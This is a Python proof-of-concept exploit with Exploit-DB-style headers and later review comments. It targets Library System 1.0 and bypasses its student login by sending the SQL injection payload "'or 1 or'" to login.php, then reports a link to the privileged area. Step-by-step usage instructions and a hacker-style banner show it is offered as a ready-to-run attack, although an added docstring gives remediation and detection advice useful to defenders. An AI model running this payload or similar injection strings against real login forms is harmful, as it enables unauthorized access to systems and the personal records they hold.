# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection

#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnable Application.For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
#Note - You Will Only Be Able To Access The Student Area as a Privileged User.

"""Proof-of-concept for the login weakness described in the header above.

What the script visibly does: it POSTs a crafted ``student`` form value to
``login.php`` and treats the absence of the string "Student not found" in the
response body as a successful login.  The root cause is presumably that the
application builds its SQL lookup from the raw ``student`` field rather than
binding it as a query parameter (not shown here; inferred from the payload).

Defensive notes for whoever maintains the target application:

* Remediation: use a prepared/parameterised statement for the student lookup
  and verify the credential server-side; never assemble the WHERE clause from
  form input.
* Detection: login requests whose fields carry SQL quote/OR tokens, or logins
  that "succeed" without matching exactly one student record, are the signal
  to alert on.  The success check below relies only on a fixed error string,
  so a server that changes that message would make this PoC report failure
  while the underlying defect is unchanged.
"""

import requests

# ANSI colour codes used only for terminal output.
YELLOW ='\033[33m' # Yellow Text
GREEN ='\033[32m' # Green Text
RED ='\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

# Banner.  NOTE(review): the third line contains literal "<code>"/"</code>",
# which looks like markup garbling of backticks during extraction; kept as-is
# because it is a runtime string.
print(YELLOW+'________ ____ ', RESET)
print(YELLOW+'___| |_ ___ / / ___|| |__ __ ___| |/ _ \____', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _<code> |/ _</code> | | | \ \ /\ / /", RESET)
print(YELLOW+'|__/ || (__ / /___) | | | | (_| | (_| | |_| |\ VV / ', RESET)
print(YELLOW+' \___|\__\___/_/|____/|_| |_|\__,_|\__,_|\___/\_/\_/', RESET)
print(YELLOW+" ", RESET)
print('********************************************************')
print('**LIBRARY SYSTEM 1.0**')
print('** AUTHENTICATION BYPASS USING SQL INJECTION**')
print('********************************************************')
print('Author - Himanshu Shukla')

#Create a new session
# A requests.Session persists cookies across the two POSTs below.
s = requests.Session()

#Set Cookie
# A fixed PHPSESSID is sent explicitly on every request.  NOTE(review): the
# Session object would already carry any cookie set by the first response, so
# this explicit cookie is presumably redundant -- confirm against the target.
cookies: dict[str, str] = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}

# Base URL; it is concatenated directly with 'login.php' / 'index.php' below,
# so it must end with a trailing slash (as in the STEP 2 example).
LINK=input("Enter URL of The Vulnarable Application : ")

#Authentication Bypass
print("[*]Attempting Authentication Bypass...")

# Form fields sent to login.php.  ``student`` is the field the application is
# assumed to interpolate into its query; ``login`` is the submit button name.
values: dict[str, str] = {"student":"'or 1 or'","login":""}

# The same POST is issued twice.  NOTE(review): no reason is stated in the
# source; perhaps the first request only establishes the session -- confirm.
r=s.post(LINK+'login.php', data=values, cookies=cookies)
r=s.post(LINK+'login.php', data=values, cookies=cookies)

#Check if Authentication was bypassed or not.
# Success is inferred solely from the absence of the application's
# "Student not found" error text in the second response.
logged_in: bool = True if not("Student not found" in r.text) else False
# ``l`` is a plain alias of ``logged_in``; no additional meaning is visible here.
l=logged_in

if l:
    print(GREEN+"[+]Authentication Bypass Successful!", RESET)
    print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
    print(RED+"[-]Failed To Authenticate!", RESET)